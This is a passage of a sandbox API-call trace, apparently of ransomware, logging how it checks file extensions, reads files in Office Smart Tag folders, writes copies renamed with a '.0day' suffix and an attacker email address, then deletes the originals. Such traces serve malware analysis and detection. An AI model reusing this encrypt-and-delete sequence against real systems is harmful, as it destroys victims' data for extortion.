[0041.574] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.574] lstrlenW (lpString=".rar") returned 4 [0041.574] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.574] lstrlenW (lpString=".bz2") returned 4 [0041.574] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.574] lstrlenW (lpString=".7z") returned 3 [0041.574] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.574] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.574] lstrlenW (lpString=".dbf") returned 4 [0041.574] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.574] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.574] lstrlenW (lpString=".1cd") returned 4 [0041.574] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.574] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.574] lstrlenW (lpString=".jpg") returned 4 [0041.574] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.574] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0041.574] lstrlenW (lpString="TIME.XML") returned 8 [0041.574] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.575] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=8564) returned 1 [0041.575] CloseHandle (hObject=0x208) returned 1 [0041.575] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml")) returned 0x20 [0041.575] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0041.575] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.575] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.575] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.575] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0041.576] GetLastError () returned 0x0 [0041.576] ReadFile (in: hFile=0x208, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x2174, lpOverlapped=0x0) returned 1 [0041.577] WriteFile (in: hFile=0x16c, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x2180, lpOverlapped=0x0) returned 1 [0041.578] ReadFile (in: hFile=0x208, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.578] WriteFile (in: hFile=0x16c, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0041.578] SetEndOfFile (hFile=0x16c) returned 1 [0041.578] CloseHandle (hObject=0x16c) returned 1 [0041.579] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.579] SetEndOfFile (hFile=0x208) returned 1 [0041.580] CloseHandle (hObject=0x208) returned 1 [0041.580] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0041.580] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml")) returned 1 [0041.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.580] lstrlenW (lpString=".doc") returned 4 [0041.580] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.580] lstrlenW (lpString=".docx") returned 5 [0041.580] lstrcmpiW (lpString1=".docx", lpString2="E.XML") returned -1 [0041.580] lstrlenW (lpString=".pdf") returned 4 [0041.581] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.581] lstrlenW (lpString=".xls") returned 4 [0041.581] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.581] lstrlenW (lpString=".xlsx") returned 5 [0041.581] lstrcmpiW (lpString1=".xlsx", lpString2="E.XML") returned -1 [0041.581] lstrlenW (lpString=".ppt") returned 4 [0041.581] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.581] lstrlenW (lpString=".zip") returned 4 [0041.581] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.581] lstrlenW (lpString=".rar") returned 4 [0041.581] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.581] lstrlenW (lpString=".bz2") returned 4 [0041.581] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.581] lstrlenW (lpString=".7z") returned 3 [0041.581] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.581] lstrlenW (lpString=".dbf") returned 4 [0041.581] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.581] lstrlenW (lpString=".1cd") returned 4 [0041.581] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.581] lstrlenW (lpString=".jpg") returned 4 [0041.581] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.581] lstrlenW (lpString=".doc") returned 4 [0041.581] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.581] lstrlenW (lpString=".docx") returned 5 [0041.581] lstrcmpiW (lpString1=".docx", lpString2="E.XML") returned -1 [0041.581] lstrlenW (lpString=".pdf") returned 4 [0041.581] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.581] lstrlenW (lpString=".xls") returned 4 [0041.582] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.582] lstrlenW (lpString=".xlsx") returned 5 [0041.582] lstrcmpiW (lpString1=".xlsx", lpString2="E.XML") returned -1 [0041.582] lstrlenW (lpString=".ppt") returned 4 [0041.582] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.582] lstrlenW (lpString=".zip") returned 4 [0041.582] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.582] lstrlenW (lpString=".rar") returned 4 [0041.582] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.582] lstrlenW (lpString=".bz2") returned 4 [0041.582] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.582] lstrlenW (lpString=".7z") returned 3 [0041.582] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.582] lstrlenW (lpString=".dbf") returned 4 [0041.582] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.582] lstrlenW (lpString=".1cd") returned 4 [0041.582] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0041.582] lstrlenW (lpString=".jpg") returned 4 [0041.582] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.582] lstrcmpiW (lpString1=".XSL", lpString2=".0day") returned 1 [0041.582] lstrlenW (lpString="BASMLA.XSL") returned 10 [0041.582] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.583] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=227311) returned 1 [0041.583] CloseHandle (hObject=0x208) returned 1 [0041.583] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl")) returned 0x20 [0041.583] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0041.583] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.583] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.583] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.583] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0041.584] GetLastError () returned 0x0 [0041.584] ReadFile (in: hFile=0x208, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x377ef, lpOverlapped=0x0) returned 1 [0041.589] WriteFile (in: hFile=0x16c, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x377f0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x377f0, lpOverlapped=0x0) returned 1 [0041.592] ReadFile (in: hFile=0x208, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.592] WriteFile (in: hFile=0x16c, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0041.593] SetEndOfFile (hFile=0x16c) returned 1 [0041.593] CloseHandle (hObject=0x16c) returned 1 [0041.595] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.595] SetEndOfFile (hFile=0x208) returned 1 [0041.597] CloseHandle (hObject=0x208) returned 1 [0041.597] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0041.597] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl")) returned 1 [0041.597] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0041.597] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0041.597] lstrlenW (lpString=".doc") returned 4 [0041.597] lstrcmpiW (lpString1=".doc", lpString2=".XSL") returned -1 [0041.597] lstrlenW (lpString=".docx") returned 5 [0041.597] lstrcmpiW (lpString1=".docx", lpString2="A.XSL") returned -1 [0041.597] lstrlenW (lpString=".pdf") returned 4 [0041.597] lstrcmpiW (lpString1=".pdf", lpString2=".XSL") returned -1 [0041.597] lstrlenW (lpString=".xls") returned 4 [0041.597] lstrcmpiW (lpString1=".xls", lpString2=".XSL") returned -1 [0041.597] lstrlenW (lpString=".xlsx") returned 5 [0041.597] lstrcmpiW (lpString1=".xlsx", lpString2="A.XSL") returned -1 [0041.598] lstrlenW (lpString=".ppt") returned 4 [0041.598] lstrcmpiW (lpString1=".ppt", lpString2=".XSL") returned -1 [0041.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0041.598] lstrlenW (lpString=".zip") returned 4 [0041.598] lstrcmpiW (lpString1=".zip", lpString2=".XSL") returned 1 [0041.598] lstrlenW (lpString=".rar") returned 4 [0041.598] lstrcmpiW (lpString1=".rar", lpString2=".XSL") returned -1 [0041.598] lstrlenW (lpString=".bz2") returned 4 [0041.598] lstrcmpiW (lpString1=".bz2", lpString2=".XSL") returned -1 [0041.598] lstrlenW (lpString=".7z") returned 3 [0041.598] lstrcmpiW (lpString1=".7z", lpString2="XSL") returned -1 [0041.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0041.598] lstrlenW (lpString=".dbf") returned 4 [0041.598] lstrcmpiW (lpString1=".dbf", lpString2=".XSL") returned -1 [0041.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0041.598] lstrlenW (lpString=".1cd") returned 4 [0041.598] lstrcmpiW (lpString1=".1cd", lpString2=".XSL") returned -1 [0041.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0041.598] lstrlenW (lpString=".jpg") returned 4 [0041.598] lstrcmpiW (lpString1=".jpg", lpString2=".XSL") returned -1 [0041.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0041.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0041.598] lstrlenW (lpString=".doc") returned 4 [0041.598] lstrcmpiW (lpString1=".doc", lpString2=".XSL") returned -1 [0041.598] lstrlenW (lpString=".docx") returned 5 [0041.598] lstrcmpiW (lpString1=".docx", lpString2="A.XSL") returned -1 [0041.598] lstrlenW (lpString=".pdf") returned 4 [0041.598] lstrcmpiW (lpString1=".pdf", lpString2=".XSL") returned -1 [0041.598] lstrlenW (lpString=".xls") returned 4 [0041.598] lstrcmpiW (lpString1=".xls", lpString2=".XSL") returned -1 [0041.598] lstrlenW (lpString=".xlsx") returned 5 [0041.598] lstrcmpiW (lpString1=".xlsx", lpString2="A.XSL") returned -1 [0041.598] lstrlenW (lpString=".ppt") returned 4 [0041.598] lstrcmpiW (lpString1=".ppt", lpString2=".XSL") returned -1 [0041.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0041.599] lstrlenW (lpString=".zip") returned 4 [0041.599] lstrcmpiW (lpString1=".zip", lpString2=".XSL") returned 1 [0041.599] lstrlenW (lpString=".rar") returned 4 [0041.599] lstrcmpiW (lpString1=".rar", lpString2=".XSL") returned -1 [0041.599] lstrlenW (lpString=".bz2") returned 4 [0041.599] lstrcmpiW (lpString1=".bz2", lpString2=".XSL") returned -1 [0041.599] lstrlenW (lpString=".7z") returned 3 [0041.599] lstrcmpiW (lpString1=".7z", lpString2="XSL") returned -1 [0041.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0041.599] lstrlenW (lpString=".dbf") returned 4 [0041.599] lstrcmpiW (lpString1=".dbf", lpString2=".XSL") returned -1 [0041.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0041.599] lstrlenW (lpString=".1cd") returned 4 [0041.599] lstrcmpiW (lpString1=".1cd", lpString2=".XSL") returned -1 [0041.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0041.599] lstrlenW (lpString=".jpg") returned 4 [0041.599] lstrcmpiW (lpString1=".jpg", lpString2=".XSL") returned -1 [0041.599] lstrcmpiW (lpString1=".TXT", lpString2=".0day") returned 1 [0041.599] lstrlenW (lpString="METCONV.TXT") returned 11 [0041.599] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0041.969] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=1183416) returned 1 [0041.969] CloseHandle (hObject=0x170) returned 1 [0041.969] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt")) returned 0x20 [0041.969] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0041.969] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0041.969] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.969] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.969] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.970] GetLastError () returned 0x0 [0041.970] ReadFile (in: hFile=0x170, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0041.990] WriteFile (in: hFile=0x208, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0042.005] ReadFile (in: hFile=0x170, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x20ec8, lpOverlapped=0x0) returned 1 [0042.249] WriteFile (in: hFile=0x208, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x20ed0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x20ed0, lpOverlapped=0x0) returned 1 [0042.254] ReadFile (in: hFile=0x170, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.254] WriteFile (in: hFile=0x208, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xea, lpOverlapped=0x0) returned 1 [0042.254] SetEndOfFile (hFile=0x208) returned 1 [0042.254] CloseHandle (hObject=0x208) returned 1 [0042.254] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.254] SetEndOfFile (hFile=0x170) returned 1 [0042.256] CloseHandle (hObject=0x170) returned 1 [0042.256] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0042.256] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt")) returned 1 [0042.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0042.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0042.256] lstrlenW (lpString=".doc") returned 4 [0042.256] lstrcmpiW (lpString1=".doc", lpString2=".TXT") returned -1 [0042.256] lstrlenW (lpString=".docx") returned 5 [0042.256] lstrcmpiW (lpString1=".docx", lpString2="V.TXT") returned -1 [0042.256] lstrlenW (lpString=".pdf") returned 4 [0042.256] lstrcmpiW (lpString1=".pdf", lpString2=".TXT") returned -1 [0042.256] lstrlenW (lpString=".xls") returned 4 [0042.256] lstrcmpiW (lpString1=".xls", lpString2=".TXT") returned 1 [0042.257] lstrlenW (lpString=".xlsx") returned 5 [0042.257] lstrcmpiW (lpString1=".xlsx", lpString2="V.TXT") returned -1 [0042.257] lstrlenW (lpString=".ppt") returned 4 [0042.257] lstrcmpiW (lpString1=".ppt", lpString2=".TXT") returned -1 [0042.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0042.257] lstrlenW (lpString=".zip") returned 4 [0042.257] lstrcmpiW (lpString1=".zip", lpString2=".TXT") returned 1 [0042.257] lstrlenW (lpString=".rar") returned 4 [0042.257] lstrcmpiW (lpString1=".rar", lpString2=".TXT") returned -1 [0042.257] lstrlenW (lpString=".bz2") returned 4 [0042.257] lstrcmpiW (lpString1=".bz2", lpString2=".TXT") returned -1 [0042.257] lstrlenW (lpString=".7z") returned 3 [0042.257] lstrcmpiW (lpString1=".7z", lpString2="TXT") returned -1 [0042.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0042.257] lstrlenW (lpString=".dbf") returned 4 [0042.257] lstrcmpiW (lpString1=".dbf", lpString2=".TXT") returned -1 [0042.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0042.257] lstrlenW (lpString=".1cd") returned 4 [0042.257] lstrcmpiW (lpString1=".1cd", lpString2=".TXT") returned -1 [0042.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0042.257] lstrlenW (lpString=".jpg") returned 4 [0042.257] lstrcmpiW (lpString1=".jpg", lpString2=".TXT") returned -1 [0042.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0042.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0042.257] lstrlenW (lpString=".doc") returned 4 [0042.257] lstrcmpiW (lpString1=".doc", lpString2=".TXT") returned -1 [0042.257] lstrlenW (lpString=".docx") returned 5 [0042.257] lstrcmpiW (lpString1=".docx", lpString2="V.TXT") returned -1 [0042.257] lstrlenW (lpString=".pdf") returned 4 [0042.257] lstrcmpiW (lpString1=".pdf", lpString2=".TXT") returned -1 [0042.257] lstrlenW (lpString=".xls") returned 4 [0042.257] lstrcmpiW (lpString1=".xls", lpString2=".TXT") returned 1 [0042.257] lstrlenW (lpString=".xlsx") returned 5 [0042.258] lstrcmpiW (lpString1=".xlsx", lpString2="V.TXT") returned -1 [0042.258] lstrlenW (lpString=".ppt") returned 4 [0042.258] lstrcmpiW (lpString1=".ppt", lpString2=".TXT") returned -1 [0042.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart 